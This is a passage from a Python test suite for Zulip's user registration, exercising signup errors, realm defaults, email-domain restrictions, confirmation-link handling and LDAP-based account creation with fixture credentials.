'zerver.views.registration.send_confirm_registration_email',
side_effect=smtplib.SMTPException('uh oh'),
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/accounts/home/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0],
('Error in accounts_home: %s', 'uh oh'),
)
def test_bad_email_configuration_for_create_realm(self) -> None:
"""
Make sure we redirect for SMTP errors.
"""
email = self.nonreg_email('newguy')
smtp_mock = patch(
'zerver.views.registration.send_confirm_registration_email',
side_effect=smtplib.SMTPException('uh oh'),
)
error_mock = patch('logging.error')
with smtp_mock, error_mock as err:
result = self.client_post('/new/', {'email': email})
self._assert_redirected_to(result, '/config-error/smtp')
self.assertEqual(
err.call_args_list[0][0],
('Error in create_realm: %s', 'uh oh'),
)
def test_user_default_language_and_timezone(self) -> None:
"""
Check if the default language of new user is the default language
of the realm.
"""
email = self.nonreg_email('newguy')
password = "newpassword"
timezone = "US/Mountain"
realm = get_realm('zulip')
do_set_realm_property(realm, 'default_language', "de")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, timezone=timezone)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newguy')
self.assertEqual(user_profile.default_language, realm.default_language)
self.assertEqual(user_profile.timezone, timezone)
from django.core.mail import outbox
outbox.pop()
def test_default_twenty_four_hour_time(self) -> None:
"""
Check if the default twenty_four_hour_time setting of new user
is the default twenty_four_hour_time of the realm.
"""
email = self.nonreg_email('newguy')
password = "newpassword"
realm = get_realm('zulip')
do_set_realm_property(realm, 'default_twenty_four_hour_time', True)
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password)
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newguy')
self.assertEqual(user_profile.twenty_four_hour_time, realm.default_twenty_four_hour_time)
def test_signup_already_active(self) -> None:
"""
Check if signing up with an active email redirects to a login page.
"""
email = self.example_email("hamlet")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
result = self.client_get(result.url)
self.assert_in_response("You've already registered", result)
def test_signup_system_bot(self) -> None:
email = "notification-bot@zulip.com"
result = self.client_post('/accounts/home/', {'email': email}, subdomain="lear")
self.assertEqual(result.status_code, 302)
self.assertIn('login', result['Location'])
result = self.client_get(result.url)
# This is not really the right error message, but at least it's an error.
self.assert_in_response("You've already registered", result)
def test_signup_existing_email(self) -> None:
"""
Check if signing up with an email used in another realm succeeds.
"""
email = self.example_email('hamlet')
password = "newpassword"
realm = get_realm('lear')
result = self.client_post('/accounts/home/', {'email': email}, subdomain="lear")
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain="lear")
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain="lear")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, subdomain="lear")
self.assertEqual(result.status_code, 302)
get_user(email, realm)
self.assertEqual(UserProfile.objects.filter(delivery_email=email).count(), 2)
def test_signup_invalid_name(self) -> None:
"""
Check if an invalid name during signup is handled properly.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Pick a password and agree to the ToS.
result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
self.assert_in_success_response(["Invalid characters in name!"], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_without_password(self) -> None:
"""
Check if signing up without a password works properly when
password_auth_enabled is False.
"""
email = self.nonreg_email('newuser')
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with patch('zerver.views.registration.password_auth_enabled', return_value=False):
result = self.client_post(
'/accounts/register/',
{'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
# User should now be logged in.
self.assertEqual(result.status_code, 302)
user_profile = self.nonreg_user('newuser')
self.assert_logged_in_user_id(user_profile.id)
def test_signup_without_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'from_confirmation': '1'})
self.assert_in_success_response(["We just need you to do one last thing."], result)
# Verify that the user is asked for name and password
self.assert_in_success_response(['id_password', 'id_full_name'], result)
def test_signup_with_full_name(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'terms': True,
'full_name': "New Guy",
'from_confirmation': '1'})
self.assert_in_success_response(["We just need you to do one last thing."], result)
def test_signup_with_weak_password(self) -> None:
"""
Check if signing up without a full name redirects to a registration
form.
"""
email = "newguy@zulip.com"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
with self.settings(PASSWORD_MIN_LENGTH=6, PASSWORD_MIN_GUESSES=1000):
result = self.client_post(
'/accounts/register/',
{'password': 'easy',
'key': find_key_by_email(email),
'terms': True,
'full_name': "New Guy",
'from_confirmation': '1'})
self.assert_in_success_response(["We just need you to do one last thing."], result)
result = self.submit_reg_form_for_user(email,
'easy',
full_name="New Guy")
self.assert_in_success_response(["The password is too weak."], result)
with self.assertRaises(UserProfile.DoesNotExist):
# Account wasn't created.
get_user(email, get_realm("zulip"))
def test_signup_with_default_stream_group(self) -> None:
# Check if user is subscribed to the streams of default
# stream group as well as default streams.
email = self.nonreg_email('newguy')
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
default_streams = []
for stream_name in ["venice", "verona"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
result = self.submit_reg_form_for_user(email, password, default_stream_groups=["group 1"])
self.check_user_subscribed_only_to_streams("newguy", default_streams + group1_streams)
def test_signup_two_confirmation_links(self) -> None:
email = self.nonreg_email('newguy')
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
first_confirmation_url = self.get_confirmation_url_from_outbox(email)
first_confirmation_key = find_key_by_email(email)
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
second_confirmation_url = self.get_confirmation_url_from_outbox(email)
# Sanity check:
self.assertNotEqual(first_confirmation_url, second_confirmation_url)
# Register the account (this will use the second confirmation url):
result = self.submit_reg_form_for_user(email, password, full_name="New Guy",
from_confirmation="1")
self.assert_in_success_response(["We just need you to do one last thing.",
"New Guy",
email],
result)
result = self.submit_reg_form_for_user(email,
password,
full_name="New Guy")
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(user_profile.delivery_email, email)
# Now try to to register using the first confirmation url:
result = self.client_get(first_confirmation_url)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': first_confirmation_key,
'terms': True,
'full_name': "New Guy",
'from_confirmation': '1'})
# Error page should be displayed
self.assert_in_success_response(["The registration link has expired or is not valid."], result)
self.assertEqual(result.status_code, 200)
def test_signup_with_multiple_default_stream_groups(self) -> None:
# Check if user is subscribed to the streams of default
# stream groups as well as default streams.
email = self.nonreg_email('newguy')
password = "newpassword"
realm = get_realm("zulip")
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"])
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
default_streams = []
for stream_name in ["venice", "verona"]:
stream = get_stream(stream_name, realm)
do_add_default_stream(stream)
default_streams.append(stream)
group1_streams = []
for stream_name in ["scotland", "denmark"]:
stream = get_stream(stream_name, realm)
group1_streams.append(stream)
do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)
group2_streams = []
for stream_name in ["scotland", "rome"]:
stream = get_stream(stream_name, realm)
group2_streams.append(stream)
do_create_default_stream_group(realm, "group 2", "group 2 description", group2_streams)
result = self.submit_reg_form_for_user(email, password,
default_stream_groups=["group 1", "group 2"])
self.check_user_subscribed_only_to_streams(
"newguy", list(set(default_streams + group1_streams + group2_streams)))
def test_signup_without_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user('hamlet')
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
realm = get_realm("lear")
# Make an account in the Zulip realm, but we're not copying from there.
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post('/accounts/home/', {'email': email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email, password, source_realm="on",
HTTP_HOST=subdomain + ".testserver")
hamlet = get_user(self.example_email("hamlet"), realm)
self.assertEqual(hamlet.left_side_userlist, False)
self.assertEqual(hamlet.default_language, "en")
self.assertEqual(hamlet.emojiset, "google-blob")
self.assertEqual(hamlet.high_contrast_mode, False)
self.assertEqual(hamlet.enable_stream_audible_notifications, False)
self.assertEqual(hamlet.enter_sends, False)
self.assertEqual(hamlet.tutorial_status, UserProfile.TUTORIAL_WAITING)
def test_signup_with_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user('hamlet')
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
lear_realm = get_realm("lear")
self.login('hamlet')
with get_test_image_file('img.png') as image_file:
self.client_post("/json/users/me/avatar", {'file': image_file})
hamlet_in_zulip.refresh_from_db()
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post('/accounts/home/', {'email': email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'from_confirmation': '1'},
subdomain=subdomain)
self.assert_in_success_response(["Import settings from existing Zulip account",
"selected >\n Zulip Dev",
"We just need you to do one last thing."], result)
result = self.submit_reg_form_for_user(email, password, source_realm="zulip",
HTTP_HOST=subdomain + ".testserver")
hamlet_in_lear = get_user(email, lear_realm)
self.assertEqual(hamlet_in_lear.left_side_userlist, True)
self.assertEqual(hamlet_in_lear.default_language, "de")
self.assertEqual(hamlet_in_lear.emojiset, "twitter")
self.assertEqual(hamlet_in_lear.high_contrast_mode, True)
self.assertEqual(hamlet_in_lear.enter_sends, True)
self.assertEqual(hamlet_in_lear.enable_stream_audible_notifications, False)
self.assertEqual(hamlet_in_lear.tutorial_status, UserProfile.TUTORIAL_FINISHED)
zulip_path_id = avatar_disk_path(hamlet_in_zulip)
lear_path_id = avatar_disk_path(hamlet_in_lear)
zulip_avatar_bits = open(zulip_path_id, 'rb').read()
lear_avatar_bits = open(lear_path_id, 'rb').read()
self.assertTrue(len(zulip_avatar_bits) > 500)
self.assertEqual(zulip_avatar_bits, lear_avatar_bits)
def test_signup_invalid_subdomain(self) -> None:
"""
Check if attempting to authenticate to the wrong subdomain logs an
error and redirects.
"""
email = "newuser@zulip.com"
password = "newpassword"
result = self.client_post('/accounts/home/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
def invalid_subdomain(**kwargs: Any) -> Any:
return_data = kwargs.get('return_data', {})
return_data['invalid_subdomain'] = True
with patch('zerver.views.registration.authenticate', side_effect=invalid_subdomain):
with patch('logging.error') as mock_error:
result = self.client_post(
'/accounts/register/',
{'password': password,
'full_name': 'New User',
'key': find_key_by_email(email),
'terms': True})
mock_error.assert_called_once()
self.assertEqual(result.status_code, 302)
def test_replace_subdomain_in_confirmation_link(self) -> None:
"""
Check that manually changing the subdomain in a registration
confirmation link doesn't allow you to register to a different realm.
"""
email = "newuser@zulip.com"
self.client_post('/accounts/home/', {'email': email})
result = self.client_post(
'/accounts/register/',
{'password': "password",
'key': find_key_by_email(email),
'terms': True,
'full_name': "New User",
'from_confirmation': '1'}, subdomain="zephyr")
self.assert_in_success_response(["We couldn't find your confirmation link"], result)
def test_failed_signup_due_to_restricted_domain(self) -> None:
realm = get_realm('zulip')
do_set_realm_property(realm, 'invite_required', False)
do_set_realm_property(realm, 'emails_restricted_to_domains', True)
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn(f"Your email address, {email}, is not in one of the domains",
form.errors['email'][0])
def test_failed_signup_due_to_disposable_email(self) -> None:
realm = get_realm('zulip')
realm.emails_restricted_to_domains = False
realm.disallow_disposable_email_addresses = True
realm.save()
email = 'abc@mailnator.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Please use your real email address", form.errors['email'][0])
def test_failed_signup_due_to_email_containing_plus(self) -> None:
realm = get_realm('zulip')
realm.emails_restricted_to_domains = True
realm.save()
email = 'iago+label@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Email addresses containing + are not allowed in this organization.", form.errors['email'][0])
def test_failed_signup_due_to_invite_required(self) -> None:
realm = get_realm('zulip')
realm.invite_required = True
realm.save()
email = 'user@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn(f"Please request an invite for {email} from",
form.errors['email'][0])
def test_failed_signup_due_to_nonexistent_realm(self) -> None:
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=None)
self.assertIn("organization you are trying to join using {} does "
"not exist".format(email), form.errors['email'][0])
def test_access_signup_page_in_root_domain_without_realm(self) -> None:
result = self.client_get('/register', subdomain="", follow=True)
self.assert_in_success_response(["Find your Zulip accounts"], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com"],
result)
# Verify that the user is asked for name
self.assert_in_success_response(['id_full_name'], result)
# Verify that user is asked for its LDAP/Active Directory password.
self.assert_in_success_response(['Enter your LDAP/Active Directory password.',
'ldap-password'], result)
self.assert_not_in_success_response(['id_password'], result)
# Test the TypeError exception handler
with patch("zproject.backends.ZulipLDAPAuthBackendBase.get_mapped_name", side_effect=TypeError):
result = self.submit_reg_form_for_user(email,
password,
from_confirmation='1',
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["We just need you to do one last thing.",
"newuser@zulip.com"],
result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipLDAPUserPopulator',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_populate_only_registration_from_confirmation(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# Visit the confirmation link.
from django.core.mail import outbox
for message in reversed(outbox):
if email in message.to:
confirmation_link_pattern = re.compile(settings.EXTERNAL_HOST + r"(\S+)>")
confirmation_url = confirmation_link_pattern.search(
message.body).groups()[0]
break
else:
raise AssertionError("Couldn't find a confirmation email.")
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_BIND_PASSWORD='',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
AUTH_LDAP_USER_DN_TEMPLATE='uid=%(user)s,ou=users,dc=zulip,dc=com'):
result = self.client_get(confirmation_url)
self.assertEqual(result.status_code, 200)
# Full name should be set from LDAP
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assert_in_success_response(["We just need you to do one last thing.",
"New LDAP fullname",
"newuser@zulip.com"],
result)
# Verify that the user is asked for name
self.assert_in_success_response(['id_full_name'], result)
# Verify that user is NOT asked for its LDAP/Active Directory password.
# LDAP is not configured for authentication in this test.
self.assert_not_in_success_response(['Enter your LDAP/Active Directory password.',
'ldap-password'], result)
# If we were using e.g. the SAML auth backend, there
# shouldn't be a password prompt, but since it uses the
# EmailAuthBackend, there should be password field here.
self.assert_in_success_response(['id_password'], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_end_to_end(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
full_name = 'New LDAP fullname'
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Full name should be set from LDAP
self.assert_in_success_response(["We just need you to do one last thing.",
full_name,
"newuser@zulip.com"],
result)
# Submit the final form with the wrong password.
result = self.submit_reg_form_for_user(email,
'wrongpassword',
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Didn't create an account
with self.assertRaises(UserProfile.DoesNotExist):
user_profile = UserProfile.objects.get(delivery_email=email)
self.assertEqual(result.status_code, 302)
self.assertEqual(result.url, "/accounts/login/?email=newuser%40zulip.com")
# Submit the final form with the correct password.
result = self.submit_reg_form_for_user(email,
password,
full_name=full_name,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
# Short name comes from LDAP.
self.assertEqual(user_profile.short_name, "shortname")
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_split_full_name_mapping(self) -> None:
self.init_default_ldap_database()
ldap_user_attr_map = {'first_name': 'sn', 'last_name': 'cn'}
subdomain = 'zulip'
email = 'newuser_splitname@zulip.com'
password = self.ldap_password("newuser_splitname")
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
# Test split name mapping.
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, "First Last")
# Short name comes from LDAP.
self.assertEqual(user_profile.short_name, "First")
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auto_registration_on_login(self) -> None:
"""The most common way for LDAP authentication to be used is with a
server that doesn't have a terms-of-service required, in which
case we offer a complete single-sign-on experience (where the
user just enters their LDAP username and password, and their
account is created if it doesn't already exist).
This test verifies that flow.
"""
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {
'full_name': 'cn',
'short_name': 'sn',
'custom_profile_field__phone_number': 'homePhone',
}
full_name = 'New LDAP fullname'
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
self.login_with_return(email, password,
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from form which was set by LDAP.
self.assertEqual(user_profile.full_name, full_name)
self.assertEqual(user_profile.short_name, 'shortname')
# Test custom profile fields are properly synced.
phone_number_field = CustomProfileField.objects.get(realm=user_profile.realm, name='Phone number')
phone_number_field_value = CustomProfileFieldValue.objects.get(user_profile=user_profile,
field=phone_number_field)
self.assertEqual(phone_number_field_value.value, 'a-new-number')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_registration_multiple_realms(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
self.init_default_ldap_database()
ldap_user_attr_map = {
'full_name': 'cn',
'short_name': 'sn',
}
do_create_realm('test', 'test', False)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
subdomain = "zulip"
self.login_with_return(email, password,
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(
delivery_email=email, realm=get_realm('zulip'))
self.logout()
# Test registration in another realm works.
subdomain = "test"
self.login_with_return(email, password,
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(
delivery_email=email, realm=get_realm('test'))
self.assertEqual(user_profile.delivery_email, email)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_registration_when_names_changes_are_disabled(self) -> None:
password = self.ldap_password("newuser")
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
# Click confirmation link. This will 'authenticated_full_name'
# session variable which will be used to set the fullname of
# the user.
result = self.submit_reg_form_for_user(email,
password,
full_name="Ignore",
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
with patch('zerver.views.registration.name_changes_disabled', return_value=True):
result = self.submit_reg_form_for_user(email,
password,
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
user_profile = UserProfile.objects.get(delivery_email=email)
# Name comes from LDAP session.
self.assertEqual(user_profile.full_name, 'New LDAP fullname')
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_signup_with_ldap_and_email_enabled_using_email_with_ldap_append_domain(self) -> None:
password = "nonldappassword"
email = "newuser@zulip.com"
subdomain = "zulip"
self.init_default_ldap_database()
ldap_user_attr_map = {'full_name': 'cn', 'short_name': 'sn'}
with patch('zerver.views.registration.get_subdomain', return_value=subdomain):
result = self.client_post('/register/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
f"/accounts/send_confirm/{email}"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started.", result)
# If the user's email is inside the LDAP directory and we just
# have a wrong password, then we refuse to create an account
with self.settings(
POPULATE_PROFILE_VIA_LDAP=True,
LDAP_APPEND_DOMAIN='zulip.com',
AUTH_LDAP_USER_ATTR_MAP=ldap_user_attr_map,
):
result = self.submit_reg_form_for_user(
email,
password,
from_confirmation="1",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 200)
result = self.submit_reg_form_for_user(email,
password,
full_name="Non-LDAP Full Name",
# Pass HTTP_HOST for the target subdomain
HTTP_HOST=subdomain + ".testserver")
self.assertEqual(result.status_code, 302)
# We get redirected back to the login page because password was wrong
